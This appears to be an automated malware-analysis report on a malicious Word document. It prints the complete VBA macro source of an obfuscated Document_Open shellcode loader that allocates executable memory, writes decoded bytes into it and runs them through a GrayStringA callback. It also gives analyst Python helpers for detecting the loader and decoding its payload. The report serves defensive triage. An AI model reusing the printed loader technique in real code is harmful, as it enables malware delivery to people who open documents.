Verdict: MALICIOUS (Risk Score 130)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document containing VBA macros (OLE_VBA_MACROS, CLAMAV_DETECTION). A Private Sub Document_Open handler runs the payload as soon as macros are enabled, so nothing beyond the macro-enable prompt is required of the user. The SE_PASSWORD_ARCHIVE_LURE heuristic indicates the document text also gives password instructions for an archive or attachment, a lure used to keep a payload encrypted until after gateway scanning. The extracted source shows that the macro is an in-memory shellcode loader rather than a file-writing dropper: Document_Open calls nubere, which selects an entry of the UserForm control oreamnos.slicer (index ThisDocument.GetLetterContent().SenderGender + 9), takes the last 5844 characters of that entry's Name as the encoded payload, decodes them with helminthology.bong (a per-byte shift of +18 at even offsets and +17 at odd offsets, followed by standard base64 using the index table that impede() builds), allocates a PAGE_EXECUTE_READWRITE region with ntdll!NtAllocateVirtualMemory (declared as amari), copies 4384 bytes into it with ntdll!ZwWriteVirtualMemory on the current process, used as a memcpy (declared as workplace), and transfers control by passing buffer+1312 (Win64) or buffer+3154 (Win32) as the lpOutputFunc callback of user32!GrayStringA (declared as adulterer). Everything else is obfuscation: dictionary-word identifiers, dead VBA financial calls (NPer, SYD), copied-in junk procedures (ControlWord, Binary_Search_of_Array), unused API declarations (SHGetDesktopFolder, ReadConsoleW, PathFileExists, SHChangeNotification_Lock, SHGetSetFolderCustomSettingsW) and rap lyrics as comments. The shellcode itself is stored in the form control, not in the macro text, so its second-stage behaviour cannot be determined from this report alone.
Heuristics (5)
- ClamAV: Doc.Dropper.ZwMacros-6057750-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
- Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE: Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning.
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script (module ThisDocument): `End Function` / `Private Sub Document_Open()` / `Dim entomophthorales As Variant`
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below were found in document text (OLE body) and are XML namespace identifiers from XMP/RDF image metadata (Adobe XMP, Photoshop, Dublin Core), not network destinations; the macro code contains no URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
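Because every Win32/native API in this sample is reached through a Declare whose VBA-side name is a random dictionary word, triage has to key on the Lib and Alias strings rather than on the call sites. The helper below is an added example written for this report; it is not part of the sample, of oletools/olevba, or of the analyzer. SAMPLE_VBA quotes four Declare lines and three call lines from the extracted script further down (parameter names shortened); the ROLES table, the function names (resolve_declares, loader_triad, annotate_calls, verdict) and the "allocate + write + execute" verdict rule are chosen here for illustration.

```python
import re

# Constructed excerpt: Declare and call lines quoted from the extracted macro
# (modules helminthology and ThisDocument), parameter names shortened.
SAMPLE_VBA = r'''
Public Declare PtrSafe Function workplace Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal a As Any, ByVal b As Any, ByVal c As Any, ByVal d As Any, ByVal e As Any) As LongPtr
Public Declare PtrSafe Function amari Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (a As LongPtr, b As LongPtr, ByVal c As LongPtr, d As LongPtr, e As LongPtr, ByVal f As LongPtr) As LongPtr
Public Declare PtrSafe Function adulterer Lib "User32" Alias "GrayStringA" ( ByVal a As Any, ByVal b As Any, ByVal c As Any, ByVal d As Any, ByVal e As Any, ByVal f As Any, ByVal g As Any, ByVal h As Any, ByVal i As Any) As Long
Public Declare PtrSafe Function fevered Lib "Shlwapi.dll" Alias "PathFileExists" (a As LongPtr) As LongPtr
Sub nubere()
    impelled = adulterer(ratitae, ratitae, sauropodomorpha, animalia, ratitae, animalia, animalia, animalia, animalia)
End Sub
Function lip(burgh)
    quicksand = amari(ByVal unmindfully, disenable, ByVal fermented, brilliance, ByVal mab, ByVal altissimo)
    workplace ByVal waggon, detrimentally, aurelia, farad, aphyllanthaceae
End Function
'''

# Matches both the 64-bit (PtrSafe) and 32-bit Declare forms; Alias is optional.
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<name>\w+)\s+'
    r'Lib\s+"(?P<lib>[^"]*)"\s*(?:Alias\s+"(?P<alias>[^"]*)")?',
    re.IGNORECASE)

# Role table chosen for this example: the three legs of an in-memory loader.
ROLES = {
    "ntallocatevirtualmemory": "alloc", "virtualalloc": "alloc", "virtualallocex": "alloc",
    "zwwritevirtualmemory": "write", "ntwritevirtualmemory": "write",
    "rtlmovememory": "write", "writeprocessmemory": "write",
    "graystringa": "exec_callback", "graystringw": "exec_callback",
    "enumsystemlocalesa": "exec_callback", "callwindowproca": "exec_callback",
    "createthread": "exec", "createremotethread": "exec",
}

def resolve_declares(vba_src):
    """Map each Declare's VBA name to (lib, real api). The Alias, when present, is the
    real export; the VBA name is noise. strip() absorbs the trailing space the sample
    carries inside "Ntdll.dll "."""
    out = {}
    for m in DECLARE_RE.finditer(vba_src):
        api = (m.group("alias") or m.group("name")).strip()
        out[m.group("name")] = (m.group("lib").strip().lower(), api)
    return out

def loader_triad(vba_src):
    """Return {role: ["vbaName -> lib!Api", ...]} for every declared API with a known role."""
    hits = {}
    for vba_name, (lib, api) in resolve_declares(vba_src).items():
        role = ROLES.get(api.lower())
        if role:
            hits.setdefault(role, []).append(f"{vba_name} -> {lib}!{api}")
    return hits

def annotate_calls(vba_src):
    """Rewrite call sites so the obfuscated name reads as lib!RealApi (Declare lines dropped)."""
    names = resolve_declares(vba_src)
    out = []
    for line in vba_src.splitlines():
        if re.search(r"\bDeclare\b", line, re.IGNORECASE):
            continue
        new = line
        for vba_name, (lib, api) in names.items():
            new = re.sub(rf"\b{re.escape(vba_name)}\b", f"{lib}!{api}", new)
        if new != line:
            out.append(new.strip())
    return out

def verdict(vba_src):
    """Flag the allocate + write + execute combination regardless of the names used."""
    roles = set(loader_triad(vba_src))
    has_exec = bool(roles & {"exec", "exec_callback"})
    return "shellcode-loader" if {"alloc", "write"} <= roles and has_exec else "inconclusive"

if __name__ == "__main__":
    print(verdict(SAMPLE_VBA))
    for line in annotate_calls(SAMPLE_VBA):
        print(line)
```

Run against the full macros.bas from olevba, the same pass reports that PathFileExists, SHGetDesktopFolder, ReadConsoleW and the other declared exports carry no loader role, which is what separates the three functional declarations from the padding.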
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15785 bytes | afe7ad43c8e0de602230e84c0e349b6cf49d8d157bac238dda9c07032f92543e |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nubere()
Dim seamanship As Variant
Dim stylite As Integer
commutual = ThisDocument.GetLetterContent().SenderGender
oreamnos.slicer.Value = commutual + 9
immolation = "botaurus"
agaric = "to" & "st"
Set gynecomastia = oreamnos.slicer.SelectedItem
hourly = 2
hamadryad = 388
indianyellow = 58214
thrive = 379739
thrive = Financial.SYD(thrive, indianyellow, hamadryad, hourly)
canakin = gynecomastia.Name
brains = 4 - 103 + 59 + 5884
formication = Right(canakin, brains)
profit = helminthology.bong(formication)
dilapidation = 18
muharram = 35316
megascopic = 500055
decameter = NPer(52 / 815, dilapidation, -21320, megascopic, 0)
bookcase = "metaphor"
amicable = "bowwow"
#If Win64 Then
Dim caravan As Variant
Dim arrosion As LongPtr
Dim sauropodomorpha As LongPtr
Dim taft As Integer
#Else
Dim huskiness As Long
Dim sauropodomorpha As Long
Dim enbas As String
Dim arrosion As Long
#End If
cigarillo = 0
quadriplanar = "allusion"
timeful = "cleaver"
hypnosis = 4096
centered = 75
birthmark = 35119
chaserbalancer = 583933
frighteningly = NPer(72 / 725, centered, -6984, chaserbalancer, 1)
charge = "nontechnical"
rightful = "sinapis"
charivari = "overtask"
parochialism = 3
nonarboreal = 384
centrist = 31808
dracenaceae = 106652
dracenaceae = Financial.SYD(dracenaceae, centrist, nonarboreal, parochialism)
maintien = profit
aegypiidae = "co" & "ming"
arrosion = lip(maintien)
anestrus = "debitorem"
baggala = "blaser"
#If Win64 Then
Dim obtrusiveness As Long
Dim animalia As LongPtr
marrubium = "sh" & "arpe" & "ared"
mantispid = "ac" & "cipient"
indefatigably = "smatch"
Dim ratitae As LongPtr
cartography = 92 - 45 + 107 + 1158
#Else
gymnocladus = "highrise"
ph = "cl" & "amyd" & "ospore"
assafoetida = "enravishment"
Dim animalia As Long
overlay = 59 - 6 + 442
Dim ratitae As Long
cartography = overlay + 2659
#End If
Dim calliandra As String
Dim haute As Integer
animalia = 92 - 92
sauropodomorpha = arrosion + cartography
ratitae = 39 - 14 - 24
impelled = adulterer(ratitae, ratitae, sauropodomorpha, animalia, ratitae, animalia, animalia, animalia, animalia)
schizoid = 1
girlishness = 8497
je = 503183
degeneres = NPer(71 / 434, schizoid, -33576, je, 0)
End Sub
Sub ControlWord()
Dim objWord As New Word.Application
Dim rsContacts As New ADODB.Recordset
Dim strLtrContent As String
rsContacts.ActiveConnection = CurrentProject.Connection
rsContacts.Open "tblContacts"
objWord.Documents.Add
Do While Not rsContacts.EOF
strLtrContent = rsContacts("FirstName") & " " & rsContacts("LastName")
strLtrContent = strLtrContent & rsContacts("Address") & vbCrLf
strLtrContent = strLtrContent & rsContacts("City") & ", " & rsContacts("Region")
strLtrContent = strLtrContent & " " & rsContacts("PostalCode")
strLtrContent = strLtrContent & "Dear " & rsContacts("FirstName") & " "
strLtrContent = strLtrContent & rsContacts("LastName") & ":"
objWord.Selection.EndOf
objWord.Selection.Text = strLtrContent
objWord.Selection.EndOf
objWord.Selection.InsertBreak
rsContacts.MoveNext
Loop
objWord.Visible = True
objWord.PrintPreview = True
End Sub
Function restrengthen(gild, minority, infidelity)
#If Win64 Then
Dim camail As Byte
Dim gleesome As Variant
Dim waggon As LongPtr
Dim detrimentally As LongPtr
Dim aphyllanthaceae As LongPtr
Dim philosophia As String
Dim aurelia As LongPtr
Dim farad As LongPtr
#Else
Dim detrimentally As Long
Dim cooler As Long
Dim waggon As Long
Dim clinodactyly As String
Dim aurelia As Long
Dim consummation As Long
Dim aphyllanthaceae As Long
Dim hardy As Integer
Dim farad As Long
Dim martially As Variant
Dim amateurishness As Long
#End If
proliferation = Button + 132
proliferation = proliferation Or 157
detrimentally = gild
farad = infidelity
achondroplasia = "absently"
aurelia = minority
rollick = 8
indoor = 382
confederate = 30409
granuliferous = 104745
granuliferous = Financial.SYD(granuliferous, confederate, indoor, rollick)
counterexample = achondroplasia
waggon = 14 - 15
workplace ByVal waggon, detrimentally, aurelia, farad, aphyllanthaceae
Button = Fix(462)
End Function
Function lip(burgh)
Dim millenary As String
Dim barnacle As Variant
Dim googol As String
Dim incompletely As Byte
#If Win64 > 0 Then
Dim amicitia As Integer
Dim guisard As LongPtr
unpitied = 50 - 9 - 28 - 5
Dim disenable As LongPtr
Dim zionist As Variant
Dim compensatory As Integer
Dim brilliance As LongPtr
Dim ark As Long
#Else
Dim plena As Byte
Dim guisard As Long
unpitied = 53 - 49
Dim disenable As Long
Dim thraso As Byte
Dim brilliance As Long
Dim absentee As Long
Dim insensate As String
#End If
turmeric = VarPtr(guisard)
congenialness = restrengthen(turmeric, VarPtr(burgh) + 8, unpitied)
unmindfully = -1
disenable = 0
fermented = 0
brilliance = 9770
mab = 4096
altissimo = 64
quicksand = amari(ByVal unmindfully, disenable, ByVal fermented, brilliance, ByVal mab, ByVal altissimo)
counterexample = achondroplasia
counterexample = counterexample
restrengthen disenable, guisard, 4384
megilp = 43
destroy = 25127
preeclampsia = 553934
clypeus = NPer(63 / 794, megilp, -33896, preeclampsia, 0)
lip = disenable
End Function
Private Sub Document_Open()
Dim entomophthorales As Variant
Dim upwind As Integer
neology = "bullshit"
nubere
prefer = 20
clownish = 25485
millenium = 405771
caucasia = NPer(44 / 682, prefer, -33148, millenium, 1)
End Sub
Attribute VB_Name = "helminthology"
' Now tell me what got two thumbs and knows how to spit rhymes
' Work ethic harder than a Mexican
#If Win64 Then
' Good Will Hunting, got up out of the hood
' You don't gotta watch me but please watch your manners
Public Declare PtrSafe Function workplace Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal misclassified As Any, ByVal entrenched As Any, ByVal chlamyphorus As Any, ByVal arc As Any, ByVal enthronement As Any) As LongPtr
' Good Will Hunting, got up out of the hood
' Like I feel so awesome
Public Declare PtrSafe Function allopathic Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (balk As LongPtr,enema As LongPtr,centropristis As LongPtr) As LongPtr
' I'm awesome every time I lay it down
' Hands in the sky like
Public Declare PtrSafe Function abscissa Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal unattempted As LongPtr,inspiration As LongPtr,toothless As LongPtr,tailstock As LongPtr,markedly As LongPtr) As Boolean
' Wayne's World excellent
' Shawty you fine and your body is awesome
Public Declare PtrSafe Function amari Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (millicurie As LongPtr, anabolism As LongPtr, ByVal committeewoman As LongPtr,astronomerByVal As LongPtr, cracticidae As LongPtr, ByVal displeasingly As LongPtr) As LongPtr
' I assume you should make room for the elephant
' Death proof ride with Rosario Dawson
Public Declare PtrSafe Function fevered Lib "Shlwapi.dll" Alias "PathFileExists" (binocular As LongPtr) As LongPtr
' That's a side smiley face cause I'mma make the best of it
'
Public Declare PtrSafe Function attention Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (phycoerythrin As LongPtr, admeasurement As Any,subbing As LongPtr, broomcorn As Any) As Boolean
' Had a lukewarm buzz back when Luke was hot
' Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare PtrSafe Function adulterer Lib "User32" Alias "GrayStringA" ( ByVal arose As Any, ByVal toller As Any, ByVal extrapolation As Any, ByVal became As Any, ByVal nippers As Any, ByVal independence As Any, ByVal hypogammaglobulinemia As Any, ByVal tichodroma As Any, ByVal bitterish As Any) As Long
' Awesome, I guess that's awesome
' Sold out shows, girls trying to get a glitz
Public Declare PtrSafe Function disposed Lib "Shell32.dll" Alias "SHGetDesktopFolder" (trenchant As LongPtr)
' Awesome, I guess that's awesome
' Sold out shows, girls trying to get a glitz
' Awesome, I guess that's awesome
' Sold out shows, girls trying to get a glitz
#Else
' Had a lukewarm buzz back when Luke was hot
' Semi colon dash parenthesis, text messaging
Public Declare Function workplace Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal archespore As Any, ByVal ptilonorhynchus As Any, ByVal beneficent As Any, ByVal alphanumerics As Any, ByVal centrifuge As Any) As Long
' That's why I can walk up into any restaurant and close the whole thing
' Wanna roll
Public Declare Function daze Lib "Shell32.dll" Alias "SHGetDesktopFolder" (analogous As Long)
' Awesome, well let's go, awesome
' Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function ferine Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal rancorous As Long, congealed As Long, gumdrop As Long, anchor As Long, familiarization As Long) As Boolean
' Death proof ride with Rosario Dawson
' How rude, Stephanie Tanner
Public Declare Function amari Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (controversially As Long, sadist As Long, ByVal parasail As Long, civilizationByVal As Long, genealogically As Long, ByVal capsaicin As Long) As Long
' And y'all can just deal with the rest of it
' Two thumbs up, you gon point em at this guy
Public Declare Function colombo Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (curricular As Long, glechoma As Any, immitigable As Long, dequet As Any) As Boolean
' Trying to escape like Cuba Gooding with the flow
' That's why I can walk up into any restaurant and close the whole thing
Public Declare Function adulterer Lib "User32" Alias "GrayStringA" (ByVal pitterpatter As Any, ByVal lq As Any, ByVal inconceivableness As Any, ByVal saintbernardslily As Any, ByVal personalities As Any, ByVal exacting As Any, ByVal aseptic As Any, ByVal crooner As Any, ByVal ceremoniously As Any) As Long
' Gator on my shirt, what did it Lacoste him
' Cooler than a peppermint
Public Declare Function astraphobia Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (kaolinite As Long, eacles As Long, straitlaced As Long) As Long
' Work ethic harder than a Mexican
' How rude, Stephanie Tanner
Public Declare Function georgia Lib "Shlwapi.dll" Alias "PathFileExists" (locomotion As Long) As Long
'
' Two thumbs up, you gon point em at this guy
' How you feel
' Al Hedison couldn't be this fly so ask how I feel and you know I reply…
#End If
' Sold out shows, girls trying to get a glitz
' I'm A-W-E, some call me awesome
Sub Binary_Search_of_Array()
Dim intThousand(1000) As Integer
Dim i As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant
For i = 1 To 1000
intThousand(i) = i
Next i
varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)
Do
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)
If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub
Function monopolist(aboutface)
monopolist = AscW(aboutface)
End Function
Function clonus(alternation, hardihood, satinwood)
Select Case satinwood
Case 48
clonus = alternation \ hardihood
Case 58
clonus = alternation And hardihood
Case 66
clonus = alternation * hardihood
End Select
End Function
Function bong(expurgated) As String
Dim agerasia(6965) As Byte
Dim entail As Integer
Dim singlelane As Long
Dim stiffbacked As String
Dim beardless As Integer
Dim uranogrraphy As Byte
counterexample = achondroplasia
Dim deadness As Long
Dim calligrapher As Long
Dim cloudtouching(63) As Long
Dim gramophone As Long
Dim spindle As Long
Dim drosera() As Byte
proliferation = Fix(407)
Dim cabman As Variant
Dim flashing(63) As Long
Dim blinker(63) As Long
achondroplasia = achondroplasia
Dim gamp As Integer
pulsed = 46 + 210
Dim contrastive As Integer
genocide = 16711680
displacency = 65536
oxalate = 262144
blare = 4096
jiqui = 4032
adrenergic = 70 - 62 + 16515064
unsightliness = 65280
pyrology = 63
coals = 258048
OverPrint = 128 + 19 - 73 + 181
Dim drawee As Integer
affiance = 64
Dim hipposideros As Integer
pretentiously = 0
ephor = 5843
Dim bestow() As Byte
Dim toucb As Integer
bestow = VBA.Strings.StrConv(expurgated, vbFromUnicode)
Dim dequantitate As Long
enemy = 8
highvoltage = 269
renovate = 28719
al = 190179
al = Financial.SYD(al, renovate, highvoltage, enemy)
doublecrosser = 5843
torrefaction = 2 + Sqr(RGB(0, 1, 0))
For closed = 0 To doublecrosser
If closed Mod 2 = 0 Then
bestow(closed) = bestow(closed) + torrefaction
Else
bestow(closed) = bestow(closed) + torrefaction - 1
End If
Next closed
far = 3
misshapen = 285
deduce = 35366
foreknowledge = 256021
foreknowledge = Financial.SYD(foreknowledge, deduce, misshapen, far)
beardless = 0
takelma = 0
oecology = 61 - 18
cape = impede
For spindle = 0 To 63
cloudtouching(spindle) = clonus(spindle, affiance, 66)
flashing(spindle) = clonus(spindle, blare, 66)
blinker(spindle) = clonus(spindle, oxalate, 66)
Next spindle
autarchic = 65
beroe = 37743
mumper = 469293
benzocaine = NPer(72 / 605, autarchic, -26549, mumper, 0)
drosera = bestow
konini = 4
mentor = 50
rhine = 3654
deriving = 203683
northern = NPer(31 / 695, mentor, -14080, deriving, 1)
female = 3
proliferation = Fix(132)
achondroplasia = counterexample
doorplate = female + 1
namely = 2
For calligrapher = 0 To doublecrosser
carefully = drosera(calligrapher)
cherub = drosera(calligrapher + 2)
deadness = blinker(cape(carefully)) _
+ flashing(cape(drosera(calligrapher + 1))) + cloudtouching(cape(cherub)) + cape(drosera(calligrapher + female))
spindle = clonus(deadness, genocide, 58)
agerasia(singlelane) = clonus(spindle, displacency, 48)
spindle = clonus(deadness, unsightliness, 58)
agerasia(singlelane + 1) = clonus(spindle, pulsed, 48)
agerasia(singlelane + namely) = clonus(deadness, OverPrint, 58)
singlelane = singlelane + namely + 1
calligrapher = calligrapher + 3
Next
bong = agerasia
End Function
Function impede()
Dim particularized(255) As Byte
conic = 68 - 3
Do
particularized(conic) = conic - 65
conic = conic + 1
Loop Until conic = 91
conic = 48
Do
particularized(conic) = conic + 4
conic = conic + 1
Loop Until conic = 58
conic = 97
Do
particularized(conic) = conic - 71
conic = conic + 1
Loop Until conic = 123
particularized(47) = 63
conic = 43
particularized(conic) = 62
impede = particularized
End Function
Attribute VB_Name = "oreamnos"
Attribute VB_Base = "0{1DAD426D-BD4D-448F-A70F-8656D7A0D5C1}{688B6263-34CB-4F4F-BC49-617CBB883A19}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
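To recover the shellcode from a sample of this family, an analyst reproduces helminthology.bong: convert the string to bytes (StrConv ... vbFromUnicode), add 18 to every even-offset byte and 17 to every odd-offset byte (torrefaction = 2 + Sqr(RGB(0, 1, 0)) = 2 + Sqr(256) = 18), then base64-decode with the standard index table that impede() fills in. The Python below is an added example written for this report, not code from the sample, from olevba or from the analyzer. The constants are read off the macro above (Right(name, 5844) in nubere, the 4384-byte copy in lip, the callback offsets 1312 and 3154 from cartography); the function names, the encoder and the 12-byte CONSTRUCTED_PAYLOAD are mine, since the real encoded string (the form-control item name) is not reproduced on this page.

```python
import base64
import math

# torrefaction = 2 + Sqr(RGB(0, 1, 0)) in bong(): RGB(0, 1, 0) = 0x000100 = 256, Sqr = 16
SHIFT = 2 + int(math.sqrt(256))                      # 18
PAYLOAD_CHARS = 5844                                 # brains = 4 - 103 + 59 + 5884; Right(name, 5844)
COPY_LEN = 4384                                      # lip(): restrengthen disenable, guisard, 4384
ENTRY_OFFSET = {"x64": 92 - 45 + 107 + 1158,         # cartography under #If Win64 = 1312
                "x86": (59 - 6 + 442) + 2659}        # overlay + 2659 under #Else = 3154

def unshift(blob: bytes) -> bytes:
    """Undo the loop in bong(): even offsets get +18, odd offsets get +17.
    The & 0xFF is only a Python guard; VBA would raise Overflow on a Byte, which
    cannot happen because every shifted value is a base64 character (43..122)."""
    return bytes((b + SHIFT - (i % 2)) & 0xFF for i, b in enumerate(blob))

def decode_payload(stored: str, length: int = PAYLOAD_CHARS) -> bytes:
    """Decode the last `length` characters of the form-control string the way
    nubere() -> bong() do. Offsets for the 18/17 alternation count from the
    start of the sliced string, exactly like the macro's `closed` loop index."""
    data = stored[-length:].encode("latin-1")        # StrConv(expurgated, vbFromUnicode)
    if len(data) % 4:
        # bong() walks the buffer in fixed groups of 4 (calligrapher += 3, then Next)
        # with no padding logic, so any other length is not something the macro decodes.
        raise ValueError("encoded payload length must be a multiple of 4")
    # impede() is the standard base64 index table (A-Z, a-z, 0-9, '+', '/') and the
    # 18/12/6-bit packing plus the 0xFF0000 / 0xFF00 / 0xFF splits are textbook base64.
    return base64.b64decode(unshift(data), validate=True)

def shellcode_entry(payload: bytes, arch: str = "x64") -> int:
    """Offset inside the decoded buffer that GrayStringA is asked to call as lpOutputFunc;
    this is where disassembly of the recovered bytes should start."""
    off = ENTRY_OFFSET[arch]
    if off >= min(len(payload), COPY_LEN):
        raise ValueError("entry offset lies outside the bytes the macro copies")
    return off

def encode_payload(payload: bytes) -> str:
    """Inverse transform, constructed for testing only; the sample contains no encoder."""
    b64 = base64.b64encode(payload)
    return bytes((c - SHIFT + (i % 2)) & 0xFF for i, c in enumerate(b64)).decode("latin-1")

# Constructed 12-byte stand-in for shellcode; the real payload is not on this page.
CONSTRUCTED_PAYLOAD = bytes(range(0x90, 0x9C))

if __name__ == "__main__":
    blob = encode_payload(CONSTRUCTED_PAYLOAD)
    print(repr(blob), decode_payload(blob).hex())
```

As a quick sanity check, the four characters BF4d are what the macro would store for the standard base64 test vector TWFu, and decode_payload("BF4d") returns b"Man". On a real sample, feed it the item name extracted from the oreamnos form (olevba -a or oledump on the form stream) and start disassembling at shellcode_entry() for the architecture the document was opened under.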